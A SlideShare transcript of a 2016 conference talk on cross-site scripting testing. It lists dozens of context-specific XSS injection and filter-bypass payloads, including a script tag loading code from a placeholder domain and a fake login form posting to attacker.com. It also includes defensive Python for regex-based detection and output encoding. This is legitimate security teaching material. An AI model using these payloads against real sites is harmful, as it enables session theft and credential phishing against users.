Non-Esoteric XSS
Tips & Tricks
Miroslav Štampar
(mstampar@zsis.hr; miroslav@sqlmap.org)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 2
XSS (Cross-Site Scripting)
Injection attack against users of (otherwise) benign and trusted web sites
Used mostly in targeted attacks (e.g. spear-phishing against administrators)
For example, an attacker can send a link with malicious JavaScript (JS) code to an unsuspecting user
The user's browser has no way to know that the link should not be trusted and will execute the JS blindly – effectively giving access to cookies, session tokens or other sensitive information within browsing context
Real-world (known) cases
More about vulnerability
Considered as critical vulnerability, hence (often) well paid in bug bounty programs
Failure to (properly) sanitize/filter any of: <, >, ', " inside the response can introduce the vulnerability
While testing, responses for user supplied values are inspected for signs of the vulnerability (e.g. response returning values in original form)
Provoking JS pop-up box with custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for existence of vulnerability
Types: stored (persisting), reflected (temporary) and DOM-based (in-browser)
Food for thought :)
Testing workflow
1) Find reflecting input points (e.g. page's GET parameter values)
2) Recognize context of reflection (e.g. inside <script>...</script>)
3) Bypass sanitization/filtering and/or protection mechanism(s) (Note: if possible and/or required)
4) Write vulnerability exploitation PoC (e.g. ...alert('XSS')...)
Practical example (PoC)
Protection mechanism(s)
Common (XSS) detection regular expressions:
● /<[a-z]/i - (e.g.) <svg, <img - though, there are cases where “benign” tags such as <a> are left un-blacklisted
● /\b(java)?script\b/i - (e.g.) <script, <img src="javascript:, etc.
● /\bon\w+\s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee's onstart( is left un-blacklisted
● /\bsrc\s*=/i - (e.g.) <embed src=..., etc.
● /\b\w+\(/i - (e.g.) alert( - though, there are cases where confirm( is left un-blacklisted
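Added example (not code from the talk): the five slide regexes, with their dropped backslashes restored, run as log-triage rules over constructed request lines. The rule names, the `scan_*` helpers and the sample log lines are ours; the benign lines show the false-positive side of such blacklists, which is why the deck treats them as signals rather than as a boundary.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qsl, urlsplit

# The five blacklist patterns from the slide; the backslashes the slide
# rendering dropped (\b, \w, \s, \() are restored. Rule names are ours.
DETECTION_RULES = {
    "tag_open":      re.compile(r"<[a-z]", re.I),
    "script_word":   re.compile(r"\b(java)?script\b", re.I),
    "event_handler": re.compile(r"\bon\w+\s*=", re.I),
    "src_attr":      re.compile(r"\bsrc\s*=", re.I),
    "func_call":     re.compile(r"\b\w+\(", re.I),
}

def matching_rules(value: str) -> list[str]:
    """Names of the rules that fire on one already-decoded parameter value."""
    return [name for name, rx in DETECTION_RULES.items() if rx.search(value)]

def scan_request(path_and_query: str) -> dict[str, list[str]]:
    """Per-parameter rule hits for one request line. The query is
    percent-decoded exactly once, as the server would do it (parse_qsl also
    turns '+' into a space)."""
    report = {}
    for name, value in parse_qsl(urlsplit(path_and_query).query, keep_blank_values=True):
        hits = matching_rules(value)
        if hits:
            report[name] = hits
    return report

def scan_log(lines: list[str]) -> list[tuple[str, dict[str, list[str]]]]:
    """Requests worth a closer look: every line on which at least one rule fired."""
    flagged = []
    for line in lines:
        report = scan_request(line)
        if report:
            flagged.append((line, report))
    return flagged

# Constructed request lines (not from the talk): three deck-style payloads,
# two benign values that still trip a rule, one that trips nothing.
SAMPLE_LOG = [
    "/page.php?vuln=%22%3E%3Csvg%20onload%3Dalert(%2FXSS%2F)%3E",
    "/page.php?vuln=%22%20onmouseover%3Dalert(%2FXSS%2F)",
    "/page.php?vuln=--%3E%3Csvg%20onload%3Dalert(%2FXSS%2F)%3E",
    "/page.php?q=see+the+script+for+details",
    "/page.php?msg=%3Ca+href%3D%22%2Fhelp%22%3Ehelp%3C%2Fa%3E",
    "/page.php?q=hello+world",
]

if __name__ == "__main__":
    for line, report in scan_log(SAMPLE_LOG):
        print(line, "->", report)
```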
Sanitization mechanism(s)
Common (XSS) server response sanitizations:
● Removing all special characters - (e.g.) foo<'">bar → foobar
● Replacing all special characters with whitespace - (e.g.) foo<'">bar → foo bar
● HTML named entity encoding - (e.g.) foo<'">bar → foo&lt;&apos;&quot;&gt;bar
● HTML numeric code point encoding - (e.g.) foo<'">bar → foo&#60;&#39;&#34;&#62;bar
● Backslash escaping all special characters - (e.g.) foo<'">bar → foo\<\'\"\>bar (Note: <script>)
● Uppercase conversion - (e.g.) foo<'">bar → FOO'"BAR (combined with another mechanism(s))
Break-out of <tag...> context with > OR onXXX event handler injection
?vuln="><svg onload=alert(/XSS/)>
?vuln=" onclick="alert(/XSS/)
Usability is highly dependent on context and available <tag> events
(e.g.) Tags having visibility: hidden require breaking out of <tag...> context
<tag...> (more)
<tag...> (more)
Even though attacker's options inside <tag> are pretty narrowed (e.g. user interaction required), (ab)using CSS with style can help
?vuln=" onmouseover=alert(/XSS/) style="display: block; position: absolute; left: 0; top: 0; height: 10000px; width: 10000px; opacity: 0; cursor: default
>...<
Injecting outside of <tag> context and/or scope (e.g. </script>...) requires unfiltered < and >
Proper “Content-type” (e.g. “text/html”) is required, as in all XSS (reflected) cases (e.g. “application/json” is of no interest)
?vuln=<img src=null onerror=alert(/XSS/)>
?vuln=<script>alert(/XSS/)</script>
<!--...-->
Requires breaking-out of <!--...--> (i.e. HTML comment) context with -->
Common for (custom) sites with debugging support turned ON (e.g. returning used SQL query inside comment)
?vuln=--><svg onload=alert(/XSS/)>
As it explicitly requires usage of <tag> it is fairly common to end up as unexploitable (e.g. protections are trigger happy on occurrence(s) of <[a-zA-Z] inside parameter values)
<frame ...>
Injecting custom <frame> OR onload event handler injection (preferred)
?vuln="><frame src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
?vuln=" onload="alert(/XSS/)
Note: Non-<frame> tags can't be used because of <frameset> restrictions
<iframe...>
Break-out of <iframe...> context OR onload event handler injection (preferred)
?vuln="></iframe><svg onload=alert(/XSS/)>
?vuln=" onload="alert(/XSS/)
<input...>
Break-out of <input...> context with > OR onfocus event handler injection (preferred)
?vuln=1"><svg onload=alert(/XSS/)>
?vuln=1" autofocus onfocus="alert(/XSS/)
<input type="hidden"...>
In hidden <input> cases, combined with inability to break-out of <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work
Though, accesskey attribute can be (ab)used to make the user-assisted XSS payload (Alt-Shift-<key>)
?vuln=" accesskey="X" onclick="alert(/XSS/)
<script>...</script>
Break-out of <script>...</script> with </script> OR in-place JS injection (preferred)
?vuln=</script><svg onload=alert(/XSS/)>
?vuln=foobar');alert('XSS');var dummy=('
Common in third-party advertisement plugins
Note: In-place JS injection doesn't require <>, though it requires unfiltered ' or " in the majority of cases (interpreter syntax checks)
echo $_SERVER['PHP_SELF']
Common finding even on top sites and/or frameworks
Non-sanitized reference of current script's path
http://...php/"><svg onload="alert(/XSS/)
Not PHP-specific (though more common)
Note: JS injection in path often requires manual URL encoding of non-alphanumeric characters
<meta>
Often overlooked, though easy to exploit
Top sites tend to utilize lots of metadata
?vuln="><script>alert(/XSS/)</script>
?vuln=0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" http-equiv="refresh
<textarea> and <title>
Injection into <textarea> and <title> enclosings requires explicit (respective) closing tags (i.e. </textarea> and </title>)
Important to note because of automated scanners (majority don't check the context)
<style> is also problematic, though in case of Internet Explorer CSS expression can be (ab)used
?vuln=</textarea><svg onload=alert(/XSS/)>
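Added example (not code from the talk): a context-aware output encoder for the reflection contexts the deck walks through (text and <textarea>/<title> bodies, tag attributes, <script> strings, HTML comments), with the slide-9 backslash sanitizer beside it to show why its "(Note: <script>)" caveat holds. Function names are ours; the untrusted inputs reuse the deck's own payloads.

```python
import html
import json

# Characters the slide-9 "backslash escaping" sanitizer targets.
SPECIAL = "<>'\"\\"

def backslash_escape(value: str) -> str:
    """Slide-9 sanitizer: prefix every special character with a backslash.
    Adequate inside a JS string literal, but the HTML tokenizer that ends a
    <script> block on '</script' does not treat backslashes as escapes, so the
    break-out still works (the slide's "Note: <script>")."""
    return "".join("\\" + c if c in SPECIAL else c for c in value)

def html_text(value: str) -> str:
    """Text between tags, and RCDATA bodies such as <textarea>/<title>:
    entity-encode, so '</textarea>' or '</title>' can never appear literally."""
    return html.escape(value, quote=True)

def html_attribute(value: str) -> str:
    """Attribute value: entity-encode AND return it already double-quoted, so
    the template cannot end up with the unquoted attribute that
    onXXX= / accesskey= injection relies on."""
    return '"' + html.escape(value, quote=True) + '"'

def js_string_literal(value: str) -> str:
    """Value for a <script> context, returned as a complete quoted JS literal.
    json.dumps escapes quotes, backslashes, controls and (ensure_ascii)
    U+2028/2029; '<', '>', '&' and ''' are additionally \\u-escaped so neither
    '</script' nor a closing quote reaches the HTML parser or the interpreter."""
    literal = json.dumps(value)
    for ch in "<>&'":
        literal = literal.replace(ch, "\\u%04x" % ord(ch))
    return literal

def html_comment(value: str) -> str:
    """Slide-13 context: nothing encodes '-->' inside a comment, so refuse
    rather than emit user data (debug output, SQL) into HTML comments."""
    raise ValueError("user-controlled data must not be written into HTML comments")

def breaks_script_context(rendered: str) -> bool:
    """True if the HTML tokenizer would close the <script> element here."""
    return "</script" in rendered.lower()

# Untrusted inputs, taken from the deck's context slides.
SCRIPT_BREAKOUT = "</script><svg onload=alert(/XSS/)>"
ATTR_BREAKOUT = '"><svg onload=alert(/XSS/)>'
TEXTAREA_BREAKOUT = "</textarea><svg onload=alert(/XSS/)>"

def render_examples() -> dict:
    """Each context rendered with a deck payload as the untrusted value."""
    return {
        "script_backslash": "var q = '" + backslash_escape(SCRIPT_BREAKOUT) + "';",
        "script_encoded":   "var q = " + js_string_literal(SCRIPT_BREAKOUT) + ";",
        "attribute":        '<input type="hidden" value=' + html_attribute(ATTR_BREAKOUT) + ">",
        "textarea":         "<textarea>" + html_text(TEXTAREA_BREAKOUT) + "</textarea>",
    }

if __name__ == "__main__":
    for context, markup in render_examples().items():
        print(f"{context:17} {markup}")
```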
$_POST
Though not exploitable directly from link (i.e. address bar), it is a perfectly valid attack point
Requires malicious HTML document that has to be loaded inside the victim's web browser
Either a standalone HTML OR a link that points to the attacker's site hosting the HTML document
Protection(s) bypasses (more)
<svg/onload=alert(/XSS/)>
prompt`XSS`
onerror=confirm;throw/XSS/;
document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,...
[][(![]+[])[+[]]+([![]]+[][... // JSFuck
<SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT>
<embed src=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM...
<object data=data:text/html;base64,...
<video/poster/onerror=alert(/XSS/)>
</i/style=left:expression(alert('XSS'))>
Protection(s) bypasses (more)
<iframe src=javascript:alert('XSS')>
<isindex type=submit formaction=&#106&#97&#118&#97&#115&#99&#114&#105&#112...
<isindex type=image src=null onerror=alert(/XSS/)>
<iframe/srcdoc=&lt;svg&sol;onload&equals;alert&lpar;&quot;XSS&quot;&rpar;&gt;>
<img src=null onerror=\u0061\u006c\u0065\u0072\u0074&lpar;&quot;\u0058\u0053\u0053&quot;&rpar;>
<body style=height:9999px onwheel=prompt(/XSS/)>
<marquee onstart=confirm(/XSS/)>
p.s. HTML injection
In cases when JavaScript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point – though, not as valuable
Most common scenario is the usage of protection mechanism(s), while lacking any sanitization/filtering whatsoever
“Evil link” scenario – (e.g.)
“Fake login” scenario – (e.g.) <form action="//www.attacker.com/steal.php">...
“Fake defacement” scenario – (e.g.) <h1>This site has been hacked by l33tcr3w</h1>
p.p.s. Recommended resources
www.openbugbounty.org
html5sec.org
Questions?

Contenu connexe

En vedette

2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)arlenis camacho
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologiaarlenis camacho
 
Ladies waterproof head scarf
Ladies waterproof head scarfLadies waterproof head scarf
Ladies waterproof head scarfshopkrysi47
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologiaarlenis camacho
 
Product: UPS: FirstLine P
Product: UPS: FirstLine PProduct: UPS: FirstLine P
Product: UPS: FirstLine PStaco Energy
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)Miroslav Stampar
 
Product: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRProduct: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRStaco Energy
 
Product: UPS: UniStar V
Product: UPS: UniStar VProduct: UPS: UniStar V
Product: UPS: UniStar VStaco Energy
 
Evolución histórica de la Criminología
Evolución histórica de la CriminologíaEvolución histórica de la Criminología
Evolución histórica de la CriminologíaAdelaida Tassoni
 

En vedette (20)

2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)Revista derecho constitucional (derechos humanos y estados de excepción)
Revista derecho constitucional (derechos humanos y estados de excepción)
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologia
 
Ladies waterproof head scarf
Ladies waterproof head scarfLadies waterproof head scarf
Ladies waterproof head scarf
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
Evolucion historica de la criminologia
Evolucion historica de la criminologiaEvolucion historica de la criminologia
Evolucion historica de la criminologia
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Product: UPS: FirstLine P
Product: UPS: FirstLine PProduct: UPS: FirstLine P
Product: UPS: FirstLine P
 
COMANDOS DEL TECLADO
COMANDOS DEL TECLADOCOMANDOS DEL TECLADO
COMANDOS DEL TECLADO
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)It all starts with the ' (SQL injection from attacker's point of view)
It all starts with the ' (SQL injection from attacker's point of view)
 
Product: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVRProduct: Voltage Control: StacoAVR
Product: Voltage Control: StacoAVR
 
Computador
ComputadorComputador
Computador
 
Product: UPS: UniStar V
Product: UPS: UniStar VProduct: UPS: UniStar V
Product: UPS: UniStar V
 
Evolución histórica de la Criminología
Evolución histórica de la CriminologíaEvolución histórica de la Criminología
Evolución histórica de la Criminología
 

Similaire à Non-Esoteric XSS Tips & Tricks

Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyEoin Keary
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
15 owasp top 10 - a3-xss
15   owasp top 10 - a3-xss15   owasp top 10 - a3-xss
15 owasp top 10 - a3-xssappsec
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cristian Alexandrescu
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Introducing Malware Script Detector
Introducing Malware Script DetectorIntroducing Malware Script Detector
Introducing Malware Script Detectorguest31a5be
 
Introducing Msd
Introducing MsdIntroducing Msd
Introducing MsdAung Khant
 
XSS filter on Server side
XSS filter on Server sideXSS filter on Server side
XSS filter on Server sidecuteboysmith
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 

Similaire à Non-Esoteric XSS Tips & Tricks (20)

Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
15 owasp top 10 - a3-xss
15   owasp top 10 - a3-xss15   owasp top 10 - a3-xss
15 owasp top 10 - a3-xss
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerability
 
Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu Cross-Site Scripting course made by Cristian Alexandrescu
Cross-Site Scripting course made by Cristian Alexandrescu
 
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applicationsng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS Applications
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
XSS Injection Vulnerabilities
XSS Injection VulnerabilitiesXSS Injection Vulnerabilities
XSS Injection Vulnerabilities
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Introducing Malware Script Detector
Introducing Malware Script DetectorIntroducing Malware Script Detector
Introducing Malware Script Detector
 
Introducing Msd
Introducing MsdIntroducing Msd
Introducing Msd
 
XSS filter on Server side
XSS filter on Server sideXSS filter on Server side
XSS filter on Server side
 
Breaking Bad CSP
Breaking Bad CSPBreaking Bad CSP
Breaking Bad CSP
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 

Plus de Miroslav Stampar

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"Miroslav Stampar
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Miroslav Stampar
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseMiroslav Stampar
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureMiroslav Stampar
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsMiroslav Stampar
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 

Plus de Miroslav Stampar (9)

sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"sqlmap - "One Tiny Step At a Time"
sqlmap - "One Tiny Step At a Time"
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?Why everybody should do CTF / Wargames?
Why everybody should do CTF / Wargames?
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Improving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic DenoiseImproving Network Intrusion Detection with Traffic Denoise
Improving Network Intrusion Detection with Traffic Denoise
 
APT Attacks on Critical Infrastructure
APT Attacks on Critical InfrastructureAPT Attacks on Critical Infrastructure
APT Attacks on Critical Infrastructure
 
WARNING: Do Not Feed the Bears
WARNING: Do Not Feed the BearsWARNING: Do Not Feed the Bears
WARNING: Do Not Feed the Bears
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 

Dernier

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 

Dernier (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Non-Esoteric XSS Tips & Tricks

  • 1. Non-Esoteric XSS Tips & Tricks. Miroslav Štampar (mstampar@zsis.hr; miroslav@sqlmap.org)
  • 2. FSec – FOI 2016, Varaždin (Croatia), September 15th, 2016. XSS (Cross-Site Scripting)
